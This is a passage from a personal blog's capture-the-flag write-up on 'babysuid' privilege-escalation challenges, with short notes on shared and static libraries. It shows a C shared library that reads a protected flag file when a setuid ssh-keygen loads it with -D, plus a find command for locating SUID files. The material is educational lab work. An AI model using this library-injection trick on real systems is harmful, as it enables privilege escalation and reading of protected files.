</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="kt">int</span> <span class="nf">C_GetFunctionList</span><span class="p">(){</span>
</span></span><span class="line"><span class="cl">    <span class="n">puts</span><span class="p">(</span><span class="s">&#34;I am here&#34;</span><span class="p">);</span>
</span></span><span class="line"><span class="cl"><span class="p">}</span>
</span></span></code></pre></td></tr></table>
</div>
</div><div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span><span class="lnt">2
</span><span class="lnt">3
</span><span class="lnt">4
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-shell" data-lang="shell"><span class="line"><span class="cl">hacker@babysuid_level51:~$ ssh-keygen -D ./a.out
</span></span><span class="line"><span class="cl">I am here
</span></span><span class="line"><span class="cl">C_GetFunctionList <span class="k">for</span> provider ./a.out failed: <span class="m">10</span>
</span></span><span class="line"><span class="cl">cannot <span class="nb">read</span> public key from pkcs11
</span></span></code></pre></td></tr></table>
</div>
</div><div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span><span class="lnt">2
</span><span class="lnt">3
</span><span class="lnt">4
</span><span class="lnt">5
</span><span class="lnt">6
</span><span class="lnt">7
</span><span class="lnt">8
</span><span class="lnt">9
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-c" data-lang="c"><span class="line"><span class="cl"><span class="c1">//hack.c
</span></span></span><span class="line"><span class="cl"><span class="c1"></span><span class="kt">int</span> <span class="nf">main</span><span class="p">(</span><span class="kt">int</span> <span class="n">argc</span><span class="p">,</span><span class="kt">char</span> <span class="k">const</span> <span class="o">*</span><span class="n">argv</span><span class="p">[]){</span>
</span></span><span class="line"><span class="cl">    <span class="n">puts</span><span class="p">(</span><span class="s">&#34;hello world&#34;</span><span class="p">);</span>
</span></span><span class="line"><span class="cl"><span class="p">}</span>
</span></span><span class="line"><span class="cl"><span class="c1">// or static void inject() __attribute__((constructor));
</span></span></span><span class="line"><span class="cl"><span class="c1">//void inject(){}
</span></span></span><span class="line"><span class="cl"><span class="c1"></span><span class="kt">int</span> <span class="nf">C_GetFunctionList</span><span class="p">(){</span>
</span></span><span class="line"><span class="cl">    <span class="n">sendfile</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span><span class="n">open</span><span class="p">(</span><span class="s">&#34;../../flag&#34;</span><span class="p">,</span><span class="mi">0</span><span class="p">),</span><span class="mi">0</span><span class="p">,</span><span class="mi">4096</span><span class="p">);</span>
</span></span><span class="line"><span class="cl"><span class="p">}</span>
</span></span></code></pre></td></tr></table>
</div>
</div><div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span><span class="lnt">2
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-shell" data-lang="shell"><span class="line"><span class="cl">gcc -shared hack.c 
</span></span><span class="line"><span class="cl">ssh-keygen -D ./a.out <span class="c1">#get the flag</span>
</span></span></code></pre></td></tr></table>
</div>
</div><p><strong>Dynamic Link Library</strong>(.dll &amp; .so)</p>
<p>The library file is made into a compiled program, giving them an interface for exchanging data, and when writing a program, once a function of a library file is used, the system calls the library file into memory. When the required functionality is complete, the DLL stops running and the entire call process ends.</p>
<p><strong>Static library</strong>(.a &amp; .lib)</p>
<p>for convenience, put the general-purpose program together, this is the library. Computer has to include all the programs in the link library, making the program big.</p>
<p><strong>used to find the suid file</strong></p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span><span class="lnt">2
</span><span class="lnt">3
</span><span class="lnt">4
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-shell" data-lang="shell"><span class="line"><span class="cl">find / -type f -perm -04000 -ls 2&gt;/dev/null
</span></span><span class="line"><span class="cl"><span class="c1">#-type f: file type</span>
</span></span><span class="line"><span class="cl"><span class="c1">#-perm: permission 4000:root</span>
</span></span><span class="line"><span class="cl"><span class="c1">#2&gt;/dev/null:output the error to the &#34;blackhole/bin&#34;</span>
</span></span></code></pre></td></tr></table>
</div>
</div><p>gcc can create shared libraries with the <code>-shared</code> parameter. dll can&rsquo;t bu run alone, but rather a program that must be called by someone else. the difference between it and ordinary binaries is that it can be seen with the <code>file</code> command.</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-shell" data-lang="shell"><span class="line"><span class="cl">gcc x.c -shared -o x.so
</span></span></code></pre></td></tr></table>
</div>
</div>
</section>


    <footer class="article-footer">
    

    
    <section class="article-copyright">
        <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-copyright" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z"/>
  <circle cx="12" cy="12" r="9" />
  <path d="M14.5 9a3.5 4 0 1 0 0 6" />
</svg>



        <span>Licensed under CC BY-NC-SA 4.0</span>
    </section>
    </footer>


    
</article>

    

    

     
    
        
    <script src='//unpkg.com/@waline/client@v2/dist/waline.js'></script>
<link href='//unpkg.com/@waline/client@v2/dist/waline.css' rel='stylesheet'/>
<div id="waline" class="waline-container"></div>
<style>
    .waline-container {
        background-color: var(--card-background);
        border-radius: var(--card-border-radius);
        box-shadow: var(--shadow-l1);
        padding: var(--card-padding);
        --waline-font-size: var(--article-font-size);
    }
    .waline-container .wl-count {
        color: var(--card-text-color-main);
    }
</style><script>
    
    Waline.init({"dark":"html[data-scheme=\"dark\"]","el":"#waline","emoji":["https://unpkg.com/@waline/emojis@1.0.1/weibo"],"locale":{"admin":"Admin","placeholder":null},"requiredMeta":["name","email","url"],"serverURL":"https://blog-waline-ox87ky1di-j-shiro.vercel.app/"});
</script>

    

    <footer class="site-footer">
    <section class="copyright">
        &copy; 
        
            2020 - 
        
        2022 J-shiro&#39;s Blog<br />
        
        
            
        
            
        
            
        
            
        
            
        
            
        
            
        
        共 3.44k 字 · 共 3篇文章
        <script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>

        <br />本站访客数<span id="busuanzi_value_site_uv"></span>人次---
            <span id="busuanzi_container_site_pv"> 总访问量<span id="busuanzi_value_site_pv"></span>次 </span>---
            <span id="busuanzi_container_page_pv">本文阅读量<span id="busuanzi_value_page_pv"></span>次</span>    
    </section>
    
    <section class="powerby">
        Built with <a href="https://gohugo.io/" target="_blank" rel="noopener">Hugo</a> <br />
        Theme <b><a href="https://github.com/CaiJimmy/hugo-theme-stack" target="_blank" rel="noopener" data-version="3.13.0">Stack</a></b> designed by <a href="https://jimmycai.com" target="_blank" rel="noopener">Jimmy</a>
    </section>

    

<script type="text/javascript" src="https://cdn.jsdelivr.net/npm/live2d-widget@3.1.4/lib/L2Dwidget.min.js"></script>
<script type="text/javascript" src="https://cdn.jsdelivr.net/npm/live2d-widget@3.1.4/lib/L2Dwidget.0.min.js"></script>

<script type="text/javascript">
    L2Dwidget.init({
        model: {
            scale: 1,
            hHeadPos: 0.5,
            vHeadPos: 0.618,
            jsonPath: 'https://cdn.jsdelivr.net/npm/live2d-widget-model-hibiki@1.0.5/assets/hibiki.model.json',       
        },
        display: {
            superSample: 9,     
            width: 160,         
            height: 440,        
            position: 'left',   
            hOffset: 130,         
            vOffset: -50,         
        },
        mobile: {
            show: false,         
            scale: 1,           
            motion: true,       
        },
        react: {
            opacityDefault: 1,  
            opacityOnHover: 1,  
        },
    });
</script>


</footer>


    
<div class="pswp" tabindex="-1" role="dialog" aria-hidden="true">

    
    <div class="pswp__bg"></div>

    
    <div class="pswp__scroll-wrap">

        
        <div class="pswp__container">
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
        </div>

        
        <div class="pswp__ui pswp__ui--hidden">

            <div class="pswp__top-bar">

                

                <div class="pswp__counter"></div>

                <button class="pswp__button pswp__button--close" title="Close (Esc)"></button>

                <button class="pswp__button pswp__button--share" title="Share"></button>

                <button class="pswp__button pswp__button--fs" title="Toggle fullscreen"></button>

                <button class="pswp__button pswp__button--zoom" title="Zoom in/out"></button>

                
                
                <div class="pswp__preloader">
                    <div class="pswp__preloader__icn">
                        <div class="pswp__preloader__cut">
                            <div class="pswp__preloader__donut"></div>
                        </div>
                    </div>
                </div>
            </div>

            <div class="pswp__share-modal pswp__share-modal--hidden pswp__single-tap">
                <div class="pswp__share-tooltip"></div>
            </div>

            <button class="pswp__button pswp__button--arrow--left" title="Previous (arrow left)">
            </button>

            <button class="pswp__button pswp__button--arrow--right" title="Next (arrow right)">
            </button>

            <div class="pswp__caption">
                <div class="pswp__caption__center"></div>
            </div>

        </div>

    </div>

</div><script 
                src="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/photoswipe.min.js"integrity="sha256-ePwmChbbvXbsO02lbM3HoHbSHTHFAeChekF1xKJdleo="crossorigin="anonymous"
                defer
                >
            </script><script 
                src="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/photoswipe-ui-default.min.js"integrity="sha256-UKkzOn/w1mBxRmLLGrSeyB4e1xbrp4xylgAWb3M42pU="crossorigin="anonymous"
                defer
                >
            </script><link 
                rel="stylesheet" 
                href="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/default-skin/default-skin.min.css"crossorigin="anonymous"
            ><link 
                rel="stylesheet" 
                href="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/photoswipe.min.css"crossorigin="anonymous"
            >

    <div id="backTop" onclick="backTopFunction()" style="right: 40px; bottom: 40px; display: flex;">
        <svg xmlns="http://www.w3.org/2000/svg" height="30" width="20" viewBox="0 0 512 512"><title>Caret Up</title>
            <path d="M414 321.94L274.22 158.82a24 24 0 00-36.44 0L98 321.94c-13.34 15.57-2.28 39.62 18.22 39.62h279.6c20.5 0 31.56-24.05 18.18-39.62z" fill="#adb5bd"></path>
        </svg>
        <style type="text/css">
            #backTop {
                position: fixed;
                background-color: #fff;
                width: 40px;
                height: 40px;
                border-radius: 50%;
                display: none;
                align-items: center;
                justify-content: center;
                box-shadow: 0 0 6px rgba(0,0,0,.12);
                cursor: pointer;
                z-index: 5;
            }
    
            #backTop:hover {
                background-color: #f1f4f8;
            }
        </style>
        <script>
    
            window.onscroll = function() {scrollFunction()};
    
            function scrollFunction() {console.log(121);
                if (document.body.scrollTop > 20 || document.documentElement.scrollTop > 20) {
                    document.getElementById("backTop").style.display = "flex";
                } else {
                    document.getElementById("backTop").style.display = "none";
                }
            }
    
    
            function backTopFunction() {
                document.body.scrollTop = 0;
                document.documentElement.scrollTop = 0;
            }
        </script>
    </div>
    


            </main>
    <aside class="sidebar right-sidebar sticky">
        
            
                
    <section class="widget archives">
        <div class="widget-icon">
            <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-hash" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z"/>
  <line x1="5" y1="9" x2="19" y2="9" />
  <line x1="5" y1="15" x2="19" y2="15" />
  <line x1="11" y1="4" x2="7" y2="20" />
  <line x1="17" y1="4" x2="13" y2="20" />
</svg>



        </div>
        <h2 class="widget-title section-title">Table of contents</h2>
        
        <div class="widget--toc">
            <nav id="TableOfContents">
  <ol>
    <li><a href="#program-interactionlinux-command-line">Program Interaction:Linux Command Line</a></li>
    <li><a href="#program-misuseprivilege-escalation">Program Misuse:Privilege Escalation</a></li>
    <li><a href="#program-misusemitigations">Program Misuse:Mitigations</a></li>
    <li><a href="#babysuid-challenge">babysuid challenge</a></li>
  </ol>
</nav>
        </div>
    </section>

            
        
    </aside>


        </div>
        <script 
                src="https://cdn.jsdelivr.net/npm/node-vibrant@3.1.6/dist/vibrant.min.js"integrity="sha256-awcR2jno4kI5X0zL8ex0vi2z&#43;KMkF24hUW8WePSA9HM="crossorigin="anonymous"
                
                >
            </script><script type="text/javascript" src="/ts/main.js" defer></script>
<script>
    (function () {
        const customFont = document.createElement('link');
        customFont.href = "https://fonts.googleapis.com/css2?family=Lato:wght@300;400;700&display=swap";

        customFont.type = "text/css";
        customFont.rel = "stylesheet";

        document.head.appendChild(customFont);

    }());
</script>

<script
    src="https://cdn.jsdelivr.net/gh/zhixuan2333/gh-blog@v0.1.0/js/nprogress.min.js"
    integrity="sha384-bHDlAEUFxsRI7JfULv3DTpL2IXbbgn4JHQJibgo5iiXSK6Iu8muwqHANhun74Cqg"
    crossorigin="anonymous"
></script>
<link
    rel="stylesheet"
    href="https://cdn.jsdelivr.net/gh/zhixuan2333/gh-blog@v0.1.0/css/nprogress.css"
    integrity="sha384-KJyhr2syt5+4M9Pz5dipCvTrtvOmLk/olWVdfhAp858UCa64Ia5GFpTN7+G4BWpE"
    crossorigin="anonymous"
/>
<script>
    NProgress.start();
    document.addEventListener("readystatechange", () => {
        if (document.readyState === "interactive") NProgress.inc(0.8);
        if (document.readyState === "complete") NProgress.done();
    });
</script>

    </body>
</html>
